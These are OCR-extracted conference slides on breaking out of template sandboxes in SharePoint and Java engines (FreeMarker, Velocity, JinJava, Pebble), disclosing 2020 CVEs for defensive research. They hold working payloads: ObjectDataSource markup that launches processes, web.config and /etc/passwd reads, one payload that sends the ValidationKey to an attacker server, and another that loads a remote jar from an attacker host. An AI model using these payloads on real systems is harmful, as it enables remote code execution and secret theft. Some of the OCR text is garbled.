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Content Management Systems (CMS) 


e ACMS is an application that is used to manage 
web content 

e Allows multiple contributors to create, edit and 
publish. 

e Content is typically stored in a database and 
displayed in a presentation layer based on a 
set of templates. 

e Templates normally support a subset of 
programming language capabilities so they are 
normally sandboxed 


Our Research 


e What: 

o .NET and Java based CMSs 
e Assumption: 

o We can control Templates 
e Goal: 

o Escape Template sandboxes 


Agenda 


1. Introduction 
2. .NET (SharePoint) 
o Introduction to SharePoint ASPX pages 


o Safe Mode 
o Breaking out of Safe Mode 
o Demo 

3. Java 


o Engines and CMSs 
o Generic (object-based) Bypasses 
o Specific Engine Bypasses 

4. Conclusions 


SharePoint 
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SharePoint ASPX Pages 


Application Pages 


A.K.A. system pages 
implement server-side logic 
stored on file system 
cannot be changed by regular users 
processed as regular unrestricted 
ASPX files 
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Site Pages 


o A.K.A. user-defined pages 

o play role of “templates” for 
rendering dynamic content 

o stored in content database 

o can be customized by regular users 

o processed in safe mode 


SharePoint ASPX Pages 


File System 


SystemPage.aspx normal mode 


SPVirtualPathProvider SPPageParserFilter 


UserPage.aspx safe mode 


Content DB 


SharePoint ASPX Pages 


«$8 Page $»|————————————————————————————————— —— — — — — ————- directive 
«$0 Import |Namespace-"System" |2> attribute in directive 


«script runat="server"> 


public string ServerSideFunction () 


( server-side code block 
return "Hello World"; 


) 


€/ geielpit 
<% Lbl.Text = "Hello, world!"; 2» embedded server-side code 
<html> 
<body> 
| <asp:Label runat="server" id-"Lbl" /> |^ ^ ^ | server-side control 


<asp:Label runat="server" id-"Lb2" 


Text-"K$4 ServerSideFunction$>|_/>______data-binding expression 
[<= server-side comments =" | server-side comment 


<!-- #include virtual =" — — server-side include directive 


«/body» 
«/html» 


SharePoint ASPX Pages 


Safe Mode for Site Pages 


Compilation: NO (CompilationMode = “Never”) 

Server-Side Code: NO 

Server-Side Includes from File System: NO 

Web Controls: ONLY from AllowList (SafeControls elements in web.config) 
ASPX Directives: ONLY from AllowList 

Attributes for most of ASPX Directives: ONLY from AllowList 

Many other potentially dangerous elements are blocked 


SharePoint ASPX Pages 


Is there any place where SPPageParserFilter is not used? 


e YES! 
o  TemplateControl.ParseControl(content); 
o  TemplateControl.ParseControl(content, true); 
o Filter is used at rendering time but not at design time. 


SharePoint ASPX Pages 


Is there any place where SPPageParserFilter is not used? 


e YES! 
o  TemplateControl.ParseControl(content); 
o  TemplateControl.ParseControl(content, true); 
o Filter is used at rendering time but not at design time. 


e BUT! 
o EditingPageParser.VerifyControlOnSafeList() method is used for content 
verification for all such places in SharePoint server 
o ParseControl() method never causes compilation 
m No server-side code or other attacks that require compilation 
m Only attacks with dangerous controls or directives are relevant 


Post-escape vectors 


e Unsafe Web Controls Vector 1: 
o  invocation of public method from arbitrary Type 


ObjectDataSource: 


«asp:ObjectDataSource SelectMethod="Start" TypeName-"System.Diagnostics.Process" 
ID="DataSourcel" runat="server" > 


<SelectParameters> 


<asp:Parameter Name="fileName" DefaultValue="Gale" (> 
</SelectParameters> 


«/asp:ObjectDataSource» 
<asp:ListBox DataSourceID = "DataSourcel" ID="LB1" runat="server" /» 
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Post-escape vectors 


Unsafe Web Controls Vector 2: 


o reading arbitrary XML file 
[: XmlDataSource with DataFile attribute 


ap. DA OUES id= BEd OUES DataFile-"/web.config" runat-"server" 


XPath="/configuration/system.web/machineKey" /> 


m  Xml with DocumentSource attribute 


<asp:Xml runat="server" id="xml1" DocumentSource=" 


ASPX Server-Side Include (SSI) directive 
o reading arbitrary text file 


<!--#include virtual="/web.config"--> 


<!--#include file="c:/inetpub/wwwroot/wss/virtualdirectories/80/web.config"--> 


Post-escape vectors 


Arbitrary File Access to Remote Code Execution 


e Unsafe Deserialization by ViewState 
o value of ValidationKey is required 
m can be found in MachineKey section from web.config file 
m can be present in internal SharePoint properties 


e YSoSerial.Net tool can be used for payload generation 


YSoSerial Net 


https://github.com/pwntester/vsoserial.net 


Breaking out 
of Safe Mode 


1/5 Access to sensitive server resources 


e Target: 
o Leak sensitive information 


e Where to search: 
o Files 
o Logs 
o DB tables 
o Process Memory 


1/5 Access to sensitive server resources 


CVE-2020-0974: Unsafe SSI in SharePoint 
Details 


e EditingPageParser.VerifyControlOnSafeList() with blockServerSidelncludes = 
false during validation of ASPX markup: 


// Microsoft.SharePoint.ServerWebApplication 


bool IServerWebApplication.CheckMarkupForSafeControls (string Markup, 
RegisterDirectiveManager regDirManager) { 


EditingPageParser.VerifyControlOnSafeList (Markup, regDirManager, this. spWeb, false); 


e  webPartXml parameter in RenderWebPartForEdit method of the Web Part Pages 
service is processed in Design mode 


1/5 Access to sensitive server resources 


CVE-2020-0974: Unsafe SSI in SharePoint 
Exploitation 
e  Payload: 
«$8 Register TagPrefix-"WebPartPages" Namespace-"Microsoft.SharePoint.WebPartPage" 


Assembly-"Microsoft.SharePoint, Version = 16.0.0.0, 


Culture - neutral, 
PublicKeyToken = 71e9bcellle9429c" %> 


«WebPartPages:DataFormWebPart runat="server" Title="T" DisplayName-"N" ID-"idl"» 
<xs1> 


«/xsl» </WebPartPages:DataFormWebPart> 


e Vulnerable WebAPI endpoint: 
o http://<Site>/_vti_bin/WebPartPages.asmx 
e Result: 


o Content of web.config file with ValidationKey 
o Arbitrary code execution by Unsafe Deserialization (ViewState) 
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2/5 Abusing not-so-safe items from Allowlist 


e Target: 
o Find allowed elements with 
potentially dangerous behavior 


e Where to search: 
o List of allowed elements 


2/5 Abusing not-so-safe items from Allowlist 


CVE-2020-1147: Unsafe deserialization in control from SafeControl list 


Details 
e Microsoft.SharePoint.Portal.WebControls.ContactLinksSuggestionsMicroView 


//Mkcrosoft.SharePoint-Portal-WebControls-ContactLinksSuggestrionsMicroVilew 
protected void PopulateDataSetFromCache (DataSet ds) { 
string value = SPRequestParameterUtility.GetValue<string>(this.Page.Request, 


" SUGGESTIONSCACHE " , SPRequestParameterSource.Form); 


using (XmlTextReader xmlTextReader = new XmlTextReader (new 


System.IO.StringReader (value) )) 


ds .ReadXml (xmlTextReader); 


e XmlSerializer with controlled Type in DataSet. ReadXml() 
[e https://www.blackhat.com/docs/us- 17/thursday/us-17-Munoz-Friday-The-193th-JSON-Attacks-wp.pdf 
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2/5 Abusing not-so-safe items from Allowlist 


CVE-2020-1147: Unsafe deserialization in control from SafeControl list 
Exploitation 

e ASPX page: 
<%@ Page Language="C#" %> 


«$80 Register tagprefix-"mst" namespace-"Microsoft.SharePoint.Portal.WebControls" 
assembly-"Microsoft.SharePoint.Portal, Version=16.0.0.0, 
PublicKeyToken-71e9bcellle9429c" $» 

<form id="forml" runat="server"> 


Culture=neutral, 


«mst:ContactLinksSuggestionsMicroView id="CLSMW1" runat="server" /> 


<asp:TextBox ID-"  SUGGESTIONSCACHE _" runat="server"></asp:TextBox> 


<asp:Button ID-"Buttonl" runat="server" Text="Submit" /> 
</form> 


e Result: 
o Arbitrary code execution by unsafe deserialization 
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3/5 Abusing nested properties/attributes 


e Target: 
o  Write/Read sensitive 
configuration parameters 
o  Write/Read sensitive information 
in server/application internals 


e Where to search: 


o Anywhere user can specify 
names of properties or attributes 
for read or write access 


publicdomainvectors.org 


23 


3/5 Abusing nested properties/attributes 


e One level of properties/attributes is supported A ( D 
Examples: Ó = 
= 

SS 


o AllowList zw 


m can be relatively easy to verify 
m can be considered as safe after proper verification of AllowList elements 


o  BlockList 
m difficult to verify 
m potential ways for bypassing 


e Nested properties/attributes are supported 


Examples: 
request.authuser.name, Menu.SelectedItem.Text 


o Often only “starting point” is verified 
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3/5 Abusing nested properties/attributes 


e One level of properties/attributes is supported 


Examples: Ó 
NE 


o  AllowList 
m can be relatively easy to verify A 
m can be considered as safe after proper verification of AllowList elements 

o  BlockList 


m difficult to verify 
m potential ways for bypassing 


e Nested properties/attributes are supported 
Examples: 


request.authuser.name, Menu.SelectedItem.Text 


o Often only “starting point” is verified 
o Should not be considered as safe in this case 
o Itis nota tree! It is a network! 


Menu.Page.ModelBindingExecutionContext.HttpContext.ApplicationInstance 
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3/5 Abusing nested properties/attributes 


CVE-2020-1069: Abusing write access to nested properties in SharePoint 
Details 


e allowed control WikiContentWebpart passes user input into ParseControl() 


// Microsoft.SharePoint.WebPartPages.WikiContentWebpart 
protected override void CreateChildControls() {... 
Control obj = this.Page.ParseControl(this.Directive + this.Content, false); 


e VirtualPath is defined from Page.AppRelativeVirtualPath 


j7/ Systeme Web. ÚL Templatetontrei 


public Control ParseControl (string content, bool ignoreParserFil 


return TemplateParser.ParseControl (content, 


wane el ME ln Create (Tails .AppRelativeVirtualPath) ee OE tene rese Ie at d 


e  SPPageParserFilter applies Safe Mode based on this VirtualPath 


o If we change Page.AppRelativeVirtualPath to the path of one of the Application Pages, Safe Mode 
will be disabled! 
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3/5 Abusing nested properties/attributes 


CVE-2020-1069: Abusing write access to nested properties in SharePoint 
Exploitation 
e New value for Page.AppRelativeVirtualPath : 


<WebPartPages:WikiContentWebpart id="Wiki01" runat="server" 


Page-AppRelativeVirtualPath="newvalue"> 


«content»Ünsafe ASPX markup</content> 


</WebPartPages:WikiContentWebpart> 


e BUT Page property is not assigned yet 
e Solution: we can delay assignment by Data Binding: 


<WebPartPages:WikiContentWebpart id="Wiki01" runat="server" 


Page-AppRelativeVirtualPath-'<%# Eval("SomePropertyfromBindCtx") %>'> 


«content»Ünsafe ASPX markup</content> 


</WebPartPages:WikiContentWebpart> 
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3/5 Abusing nested properties/attributes 


CVE-2020-1069: Abusing write access to nested properties in SharePoint 
Exploitation 
e  Payload: 


<asp:menu id="NavMenul" runat="server"> 
<StaticItemTemplate> 
<WebPartPages:WikiContentWebpart id="WikiWP1" runat="server" 


Page-AppRelativeVirtualPath-' «$4 Eval("ToolTip") $»' > «content» 


<asp:ObjectDataSource ID="DS1" runat="server" SelectMethod="Start" 


TypeName-"system.diagnostics.process" > 


<SelectParameters> <asp:Parameter Direction="input" Type="string" Name="fileName" 
DefaultValue-"calc"/»«/SelectParameters»«/asp:ObjectDataSource» 
<asp:ListBox ID="LB1" runat="server" DataSourceID = "DS1" /> 
</content></WebPartPages:WikiContentWebpart> 
</StaticItemTemplate> 


<items><asp:menuitem text="MI1" ToolTip-"/ layouts/15/settings.aspx"/></items></asp:menu> 


e Result: 
o Arbitrary code execution 28 


DEMO 


SharePoint 
(CVE-2020-1069) 


3/5 Abusing nested properties/attributes 
CVE-2020-1103: Abusing read access to nested properties in SharePoint 
Details 


e ControlParameter 
o binds value of public property from a different Control to SelectParameter 
o supports nested properties 


e XmlUriDataSource 
o sends values of SelectParameters to attacker controlled server 
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3/5 Abusing nested properties/attributes 
CVE-2020-1103: Abusing read access to nested properties in SharePoint 
Details 


e SharePoint Online servers use unattended configuration and configuration 
parameters include value of ValidationKey 


e Configuration parameters will be stored in SPFarm.InitializationSettings 


e Access ValidationKey value from allowed TemplateContainer control 
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3/5 Abusing nested properties/attributes 


CVE-2020-1103: Abusing read access to nested properties in SharePoint 
Exploitation 
e  Payload: 


«t Page Language="C#" %> 


«SharePoint:TemplateContainer ID="tc01" runat="server" /» 


«SharePoint:XmlUrlDataSource runat="server" HttpMethod="GET" 
SelectCommand="http://attackersserver.com/LogReguests.php" id="DS1"> 
<SelectParameters>  «asp:controlparameter controlid="tc01" 


PropertyName="Web.Site.WebApplication.Farm.InitializationSettings [MachineValidationKey] di 
name-"MachineValidationKey" /> 


</SelectParameters> </SharePoint:XmlUrlDataSource> 
«form id="forml" runat="server"> <asp:ListBox ID="ListBox1" runat="server" 
DatasSourcelD = "D5]" o» storm 
e Result 
o value of ValidationKey 


o Arbitrary code execution by Unsafe Deserialization (ViewState) 
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4/5 Security problems during conversion 
of values to expected Types 


e Target: blackhat 
. " ERES USA 20717 
o Unsafe object instantiation 
JULY 22-27, SERE 
@ What to search for: MANDALAY BAY LAS VEGAS 
o Deserializers N the A35: JS E 
o JSON unmarshallers gorii bids j we 
Alvaro Mufioz (@pwntester) 
o TypeConverters Oleksandr Mirosh 
o Custom converters ge 


e Where to search: 


o Anywhere text or binary data is converted to an object 
o ...and Type/Class of this object is under our control 


4/5 Security problems during conversion 
of values to expected Types 
CVE-2020-1400 RIE 


e Problem affects a few Microsoft products 
e M Microsoft was not able to release fixes for all affected products 
e Details will be published as soon as the problem is fixed in all products 
e Result 
o Arbitrary code execution 


gai 
TU 


5/5 Time-of-check to time-of-use problems 


e Target: 
o Security control/filters bypass via 
TOCTOU 


e Where to search: 
o Anywhere input value can be 
changed AFTER validation 
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5/5 Time-of-check to time-of-use problems 


CVE-2020-1444: TOCTOU in WebPartEditingSurface.aspx page 


Details 
e Input validated by EditingPageParser.VerifyControlOnSafeList() 
e but after verification, we are able to remove certain substrings: 


// Microsoft.SharePoint.Publishing.Internal.CodeBehind.WebPartEditingSurfacePage 
internal static Regex tagPrefixRegex = new Regex("<%@ *Register 
“IagPBrefils=\! (L£'TIagbrefiz [PYN] TY (DITO!) SS", O) E 
private static XElement ConvertMarkupToTree (string webPartMarkup) 
(ESE. 

MatchCollection matchCollection = 
WebPartEditingSurfacePage.tagPrefixRegex.Matches (webPartMarkup); 

foreach (Match match in matchCollection) 


( 


webPartMarkup = webPartMarkup.Replace (match.Value, m: 
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5/5 Time-of-check to time-of-use problems 


CVE-2020-1444: TOCTOU in WebPartEditingSurface.aspx page 
Exploitation 


1 comment block for EditingPageParser.VerifyControlOnSafeList(): 


<%-- sufix --%> 


BUT 2 comments + ASPX markup for TemplateControl.ParseControl(content): 


<%-- prefix --%> 


<%-- sufix --%> 
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5/5 Time-of-check to time-of-use problems 


CVE-2020-1444: TOCTOU in WebPartEditingSurface.aspx page 
Exploitation 
e  Payload: 


«div id="cdatakxample"><![CDATA[ «$-- prefix -< 
Culture-neutral, PublicKeyToken-b03f5f7f11d50a3a" %>> 


<asp3:0bjectDataSource ID-"ODS1" runat="server" SelectMethod="Start" 


TypeName-"System.Diagnostics.Process" > 


<SelectParameters> 


<asp3:Parameter Direction="input" Type="string" Name="fileName" DefaultValue-"calc"/» 
</SelectParameters> 


</asp3:0bjectDataSource> <asp3:ListBox ID="LB1" runat="server" DataSourceID = "ODS1" /> 
«$-- sufix --%> ]]></div> 


e Result: 
o Arbitrary code execution 
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Java Template 
Engines 


Java CMS-like systems 


Sandboxed 


Java Template Engines E Khoros 


Pebble 


Template 


Hello $user.namel 


Hello John! 


Template Engine 4 
= 
(Oi 


VA 
user acme.User 


Context 
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Template 


Hello $user.namel 


Template Engine . Hello John! 
Key Value 
mm 
user acme.User 
request ServletRequest 
response ServletResponse 
application ServletContext 
session HttpSession 
Context 
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Generic Sandbox 
Bypasses 


Context Inspection OBJECTS 


e Access to Runtime? 
o Debug 
o  |nstrumentation 
e Otherwise 
o Documentation | name guessing 


o List context objects OBJECTS EVERYWHERE 


Indirect Objects 
e javax.serviet.http.HttpSession.getAttributeNames() 
o  $session | $request.session 
e javax.serviet.http.ServietRequest.getAttributeNames() 
o © $req | $request | $session.request 


e javax.serviet.ServietContext.getAttributeNames() 
o  $application | $request.servletContext | $session.servletContext 
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DEMO 


Object Dumpster 
Diving 


#1 ClassLoaders 


Where 


java.lang.Class.getClassLoader() 

java.lang. Thread.getCurrentClassLoader() 
java.lang.ProtectionDomain.getClassLoader() 
javax.servlet.ServletContext.getClassLoader() 
org.osgi.framework.wiring.BundleWiring.getClassLoader() 
org.springframework.context.ApplicationContext.getClassLoader() 


What 


e Arbitrary Class and Classpath Resource access 
e  Arbitrary Local file disclosure through java.net.URL access 


<#assign uri = classLoader getResource ("META-INF").toURI() > 


<#assign url = uri.resolve("file:///etc/passwd") toURL() > 
<#assign bytes = url .openConnection () .getInputStream () .readAllBytes () > 


AT 


Web Application ClassLoaders 


Tomcat 

Jetty 

GlassFish 
WildFly (JBoss) 
WebSphere 


WebLogic 


org.apache.catalina.loader.WebappClassLoader 
org.eclipse.jetty. webapp. WebAppClassLoader 
org.glassfish.web.loader.WebappClassLoader 
org.jboss.modules.ModuleClassLoader 
com.ibm.ws.classloader.CompoundClassLoader 


weblogic. utils.classloaders. ChangeAwareClassLoader 
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Remote Code Execution Vectors on Web Application ClassLoaders: 


e | WebShell upload 
o getResources().write(-) Tomcat 
Arbitrary object instantiation 
o getResources().getContext().getInstanceManager() Tomcat 
o getContext().getObjectFactory() Jetty 
JNDI lookup 
o getResources().lookup(-) GlassFish 
Attacker-controlled static class initializer 
o defineCodeGenClass (+) Weblogic 
Attacker-controlled static class initializer (FreeMarker & Pebble only) 
o newInstance ("http//attacker/pwn.a") . loadClass (“Pwner) . getField (“PWN”) .get (null) 
m Tomcat, Jetty, GlassFish ... or any java.net. URLClassLoader 
o defineApplicationClass(-).getField(-).get (null) WebSphere 
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#2 InstanceManager / ObjectFactory 


Where 
e ServletContextattributes on Tomcat, Jetty, WildFly (JBoss) 


e org.apache.catalina.InstanceManager 
e org.wildfly.extension.undertow.deployment.UndertowJSPlInstanceManager 
e org.eclipse.jetty.util.DecoratedObjectFactory 
e  WebApp Classloaders 
o Tomcat 


$request.servletContext.classLoader.resources.context.instanceManager 


o Jetty 


Srequest.servletContext.classLoader.context.objectFactory 
What 
e Arbitrary Object Instantiation > RCE. Eg: 


S{im.newInstance('javax.script.ScriptEngineManager') .getEngineByName('js') .eval ('CODE') } 
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#3 Spring Application Context 


Where 


e ServietContext attribute 
O org.springframework.web.context.WebApplicationContext.ROOT 
e Spring Macro Request Context 
o Injected by Spring MVC automatically (normally undocumented in CMS) 
o $springMacroReqguestContext.getWebApplicationContext () 
What 


e getClassLoader() 
e getEnvironment() 
e getBean() 
o Control application logic 
o Disable sandboxes 
o  [nstantiate arbitrary objects 
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COM. 
Org. 
Org. 
Org. 


org 


Other Interesting Objects 


fasterxml.jackson.databind.ObjectMapper 


Springframework.web.context.support.ServletContextScope 
Springframework.web.servlet.support.RequestContext 


apache.felix. 
.eclipse.osgi. 


framework.BundleContextImpl 
internal.framework.BundleContextImpl 


com.liferay.portal.kernel.json.JSONFactoryUtil 
freemarker.ext.beans.BeansWrapper.getStaticModels 


com. 
com. 
com. 
com. 
com. 


org 


opensymphony. 
opensymphony. 
opensymphony. 
opensymphony. 
.xstream.XStream 


thoughtworks 


.apache.camel. 


XWOPk2.ognl.OgnlUtil 
xwork2.ognl.OgnlValueStack 
xwork.DefaultActionInvocation 
webwork.util.VelocityWebWorkUtil 


CamelContext 
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Specific Sandbox 
Bypasses 


FreeMarker Sandbox 


Previous Research 


e James Kettle (PortSwigger) 2015 
o ?new() built-in (default configuration) 


S("freemarker.template.utility.Execute"?new() ("id") } 


o  https://portswigger.net/research/server-side-template-injection 


e Toni Torralba (Ackcent) 2019 
o Arbitrary object instantiation 
o Depends on non-default built-in and 3rd party library 


o  https://ackcent.com/blog/in-depth-freemarker-template-injection/ 


e Ryan Hanson (Atredis Partners) March 2020 
o RCE via File Write on Tomcat server 
o  https://github.com/atredispartners/advisories/blob/master/ATREDIS-2019-0006.md 


FreeMarker 
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Sandbox is based on method blocklist 


e Example java.lang.Class.getClassLoader is blocked 
o  class.protectionDomain.classLoader 
o  servletContext.classLoader 
O T 
e ClassLoader methods are allowed 
o  loadClass() 
o  getResource() 
O sal 
e Reflective access to public fields is allowed 
o Setting values is forbidden but .. 
o Reading them is ok 


FreeMarker 
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RCE on FreeMarker + URLClassLoader (Tomcat, GlassFish, Jetty ...) 


public class Ewn 4 
static 1 <PAYLOAD> } 
Dubie staties Shing) PWN = BOO. 


<#assign urlClassloader=car.class.protectionDomain.classLoader> 

<#assign urls=urlClassloader.getURLs ()> 

<#assign url= urls[0].toURI().resolve (https://attack.er/pwn.jar") .toURL()> 
<#assign pwnClassLoader=urlClassloader .newInstance (urls+[url])> 

<#assign VOID=pwnClassLoader loadClass ("Pwn") .getField ("PWN") get (null) > 


FreeMarker 
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CodeQL Gadget Query 


CodeQL lets you query and reason about code: 
Find me public static fields that can instantiate arbitrary types! 
Query Query X 


1 | import java 


3 from Field f, RefType t, Method m 


4 |where 

5 f.isStatic() and f.isPublic() and 

6 (t = f.getInitializer().getType() or t = any (FieldWrite init | init.getField() = f).getType()) and 
t.getASupertype*().getAMethod() = m and 

8 m.isPublic() and 

9 exists(Method ni | 

10 ni.getName() = "newInstance" and 

11 (ni.getDeclaringType().getASupertype*().getSourceDeclaration().getQualifiedName() = "java.lang.reflect.Constructor" or 

12 ni.getDeclaringType().getASupertype*().getSourceDeclaration().getQualifiedName() = "java.lang.Class") and 

m.getACallee() = ni 


Ul 


14 ) 
Í select f, t, m FreeMarker 
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apache/freemarker eedce75 4results 


SIMPLE WRAPPER 
ObjectWrapper.java:79 


DEFAULT WRAPPER 
ObjectWrapper.java:66 


BEANS WRAPPER 
ObjectWrapper.java:56 


SAFE OBJECT WRAPPER 
 TemplateAPl.java:81 


SimpleObjectWrapper 
SimpleObjectWrapper.java:29 


DefaultObjectWrapper 
DefaultObjectWrapper.java:63 


BeansWrapper 
BeansWrapper.java:88 


SimpleObjectWrapper 
SimpleObjectWrapper.java:29 
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newlnstance 


BeansWrapper.java:1630 


newlnstance 


BeansWrapper.java:1630 


newlnstance 


BeansWrapper.java:1630 


newlnstance 


BeansWrapper.java:1630 


FreeMarker 


RCE on FreeMarker 


<#assign classloader-object.class.protectionDomain.classLoader» 


<#assign owc=classloader.loadClass ('Freemarker.template.ObjectWrapper") > 


<#assign dwf-owc.getField ('DEFAULT WRAPPER") .get (null)> 


<#assign ec-classloader.loadClass (‘Ereemarker.template.utility.Execute") > 
S{dwf .newInstance (ec, null) ("<SYSTEM CMD>") } 


Fixed in 2.30 which introduces a new sandbox based on MemberAccessPolicy. 
Default policy improves the blocklist and forbids access to ClassLoader methods and public 
fields through reflection. Legacy policy is still vulnerable 


FreeMarker 
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If Spring Beans are accessible, we can normally disable the sandbox: 


<#assign ac-springMacroRequestContext.webApplicationContext» 

<#assign fc=ac.getBean ('freeMarkerConfiguration')> 

<#assign dcr-fc.getDefaultConfiguration().getNewBuiltinClassResolver()» 
<#assign VOID=fc.setNewBuiltinClassResolver (dcr) > 
${"freemarker.template.utility.Execute"?new() ("id") } 


FreeMarker 
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DEMO 


8 different ways to 
escape the Sandbox 


Velocity Sandbox 


Class & Package-based Blocklist 


(EXE OSSSOCTONR s 
IDILOSIECITOR a 
EXLOS/OOCLOLR a 
ILILOSTIGCLTO . 
EL OSPSOCTOLR a 
ILILOSISCTOT y 
(ECOSSE OI 4 


(EXE OS[SXSe EO s 
EXLOS/OOCLOL á 
(EXE OSIOS CO . 
(EX OS[9S CEOs a 
ELOSSSELOTP, 
ELOSSSELOP, 
CEOSSSEEOIP: 


COSELICE o 
POSELILCE o 
POSELILCE o 
IOS C o 
IOS AC o 
TESIEFILEB: 
TOS Cet . 
CESTICE, 
TESTELT 
TESEPILOIE: 
IOS LC y 
ice Cb. 
ice 3 Cb. 
COSEILSE o 


packages = 
classes = 
classes = 


lasses 
lasses 
lasses 
lasses 
lasses 
lasses 
lasses 
lasses 
lasses 
lasses 
lasses 


java.lang.reflect 


java. 
java. 
ava. 
ava. 
ava. 
ava. 
ava. 
ava. 


(oe WIE Weis (eels (ee Rae E TS Toe Mes IE T 


lang. 
lang. 


lan 
lan 


Class 
ClassLoader 


.Compiler 
.InheritableThreadLocal 


poononp 
pf By sr ey des] 


w 
5 


T 
5 8 


D 
E 


Q Q Q Q QO (OQ. O A ug 


. Package 

co Rirocass 

.Runtime 
.RuntimePermission 
.SecurityManager 
System 

.Thread 
.ThreadGroup 
.ThreadLocal 
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Velocity 


Blocklist checks are performed on current object class rather than inspecting the class 
hierarchy. eg: 


S{request.servletContext classLoader.loadClass ("CLASS") } 


= this = 
> @ clazz = 


"class org.apache.catalina.loader.Parallel WebappClassLoader" 


dotPos - 26 
= packageName = 


> oO badPackages = 
> oo badClasses = 
00 badPackages.length = 1 


Fixed in version 2.3 Velocity 
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Blocklist checks are performed on current object class rather than inspecting the class 


hierarchy. eg: 


$request.servletContext.classLoader.loadClass("CLASS")<static method? () 


= this = 
> @ clazz = 


"class org.apache.catalina.loader.Parallel WebappClassLoader" 


dotPos - 26 
= packageName = 


> oO badPackages = 
> oo badClasses = 
00 badPackages.length = 1 


Fixed in version 2.3 Velocity 


64 


JinJava Sandbox 


Method-based blocklist Forbids any methods returning a java.lang.Class 


RESTRICTED METHODS = eni) 


.add ("clone") 
.add ("hashCode") 
.add ("getClass") 


result = super.invoke(..., method, ...); 


if (result instanceof Class) { 
133 DECLA nue Teer throw new MethodNotFoundException () ; 
.add ("forName" ) 

.add ("notify") 

.add ("notifyAll") 


add wait", but lat); 


However, it is still possible to invoke methods that return java.lang.Class arrays or maps 


JinJava 
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"Secret" keyword to access the underlying interpreter/engine: 


.equals(property)) { 
value = this.interpreter; 
} else if (propertyName.startsWith( )) { 
item = ErrorItem.FILTER; 
value = this.interpreter.getContext().getFilter(StringUtils.substringAfter(propertyName, 


} else if (propertyName.startsWith( )) { 
item = ErrorItem.EXPRESSION_TEST; 
value = this.interpreter.getContext().getExpTest(StringUtils.substringAfter(propertyName, 
} else if (base == null) { 
value = this.interpreter.retraceVariable((String)property, this.interpreter.getLineNumber(), 


} else { 


We can use the int3rpr3t3r to access: 


e all context objects 
e exposed functions 
e exposed filters 
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JinJava 


We can access java.lang.Class instances via: 


java.lang.reflect. Method.getParameterTypes() > java.lang.Class[] 


$ set ctx = int3rpr3t3r .getContext() $) 
( 


$ set a class = ctx.getAllFunctions().toArray()[0].getMethod().getParameterTypes () [0] 3%} 
$ set cl = a class.getProtectionDomain().getClassLoader() 4%} 


Fixed in 2.5.4 (CVE-2020-12668) 


JinJava 
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Pebble Sandbox 


Method-based Blocklist 
- C 


O 


SEE 
Spring integration exposes additional objects: pu | 
, s 

e request > ServletRequest em 

o  ServletContext 

e session > HttpSession 

e response > ServietResponse 

e beans > Spring Beans!! 


Pebble 
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Conclusions 


Conclusions 


Results: 


e 30+ new vulnerabilities 
o  CVE-2020-0971, CVE-2020-0974, CVE-2020-1069, CVE-2020-1103, CVE-2020-1460, 
CVE-2020-1147, CVE-2020-1444, CVE-2020-1961, CVE-2020-4027, CVE-2020-5245, 
CVE-2020-9296, CVE-2020-9297, CVE-2020-9496, CVE-2020-10199, CVE-2020-10204, 


CVE-2020-11002, CVE-2020-11994, CVE-2020-12668, CVE-2020-12873, CVE-2020-13445 ... 


e 20+ affected products 

Pebble Netflix TitusApache Camel 
dotCMS Apache Syncope Apache OfBiz 

JinJava Netflix Conductor Alfresco 
Crafter MS SharePoint DropWizard 
Liferay Atlassian Confluence HubSpot 

Caseade Apache Velocity Lithium 

XWikiSonatype Nexus 


70 


Takeaways 


CMS should be on Red Teams radars 


Template for dynamic content could be a 
direct path to RCE for attackers 


Perform security reviews and reduce 
attack surface as much as possible 
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Thanks! 


@pwntester @OlekMirosh 


